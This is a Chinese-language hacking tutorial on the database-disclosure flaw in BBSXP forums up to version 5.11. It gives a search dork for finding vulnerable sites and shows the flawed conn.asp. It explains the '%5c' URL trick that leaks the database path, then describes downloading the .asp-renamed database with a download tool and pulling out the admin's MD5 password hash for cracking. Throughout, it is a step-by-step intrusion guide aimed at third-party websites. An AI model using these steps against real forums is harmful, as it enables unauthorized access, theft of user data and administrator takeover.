BBSXP论坛是网上非常流行的ASP论坛之一，不过从BBSXP论坛的最初版本到BBSXP5.15版，都存在着暴库安全漏洞。虽然最新版的BBSXP论坛已经没有此漏洞了，但存在漏洞的论坛在网上却是非常多的。

由于BBSXP的暴库漏洞存在于5.11版本及更早版本的BBSXP论坛中，在百度搜索页面中输入搜索关键词“Powered by BBSxp 5.11”,很快可以搜索到很多存在 漏洞的网站论坛。这些网站中，有非常多都是使用了二级目录的网站，因此会遭受到暴库漏洞攻击。

1，漏洞文件代码

打开 BBSXP 5.11 版论坛程序的数据库连接文件“conn.asp”，可以看到如下代码：

[cc lang="asp"]
<% Response.Buffer=True IsSqlDataBase=0 '定义数据库类别，0为Access数据库，1为 SQL 数据库 If IsSqlDataBase=0 Then .......access数据库..... ....... datapath = "database/" '数据库目录的相对路径 datafile = "bbsxp.mdb" '数据库的文件名 connstr="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Se rver.Mappath(""&datapath""&datafile"") 'Connstr="DBQ="&server.mappath(""&datapath&""&datafile&"")&"; DRIVER={Microsoft Access Driver(*.mdb)};" SqlNowString="Now()" SqlChar="'" ver="5.15" ....... .... else .... .... end if set conn=server.createobject("adodb.connection") conn.open connstr %>
[/code]

2,暴库入侵测试

将搜索到的目标网址"http:/www.abc.com/bbsxp/default.asp"，在论坛注册并登录论坛后，打开任意一个栏目“http://www.abc.com/bbsxp/showforum.asp?forumid=16”。

在浏览器地址中，将链接地址第二个“/”变为“%5c”，提交的网址变成了如下所示：

http://www.abc.com/bbsxp%5cshowforum.asp?forumid=16

回车后，从页面返回的提示信息中可以看到：

Microsoft JET Database Engine 错误 '80004005'

'F:\xxx\jhjt-database\jhjt-bbs.asp'不是一个有效的路径。确定路径名称拼写是否正确，以及是否连接到文件存放的服务器。

/bbsxp/setup.asp 行 4

其中的 'F:\xxx\jhjt-database\jhjt-bbs.asp'就是论坛数据库在服务器上存放的路径。不过由于“%5c”忽略的原因，因此路径上还需加上“bbsxp”，真正在的数据库地址为“ 'F:\xxx\jhjt-database\jhjt-bbs.asp'”。

3，IE无法下载ASP数据库

在上面的提示信息中，我们已经知道了 BBSXP 论坛数据库在服务器上的实际存放路径，因此可以构造出数据库的 WEB 路径。在浏览器中提交地址：

http://www.abc.com/bbsxp/jhjt-database/jhjt-bbs.asp

回车后，可以看到页面中显示出了乱码。这是因为数据库被改名为了.asp后缀，asp文件在浏览器中是会被解析的，因此不能直接访问，需要用其他方法来进行下载。

如果可以打开迅雷之类的下载工具，新建一个下载任务，将刚才的数据库地址复制到其中，就可以突破ASP程序的限制，开始下载asp数据库文件。

下载数据库后，打开刚才下载的“bbsxp.mdb”文件，选择论坛库注册用户数据库“USER”。在其中找到“membercode”栏中数值为“5”的用户，该用户就是管理员了。从中可以看到管理员用户名为“admin”,密码是经过 32 位MD5加密码的。

得到管理员的 MD5 密码后，就需要进行破解了。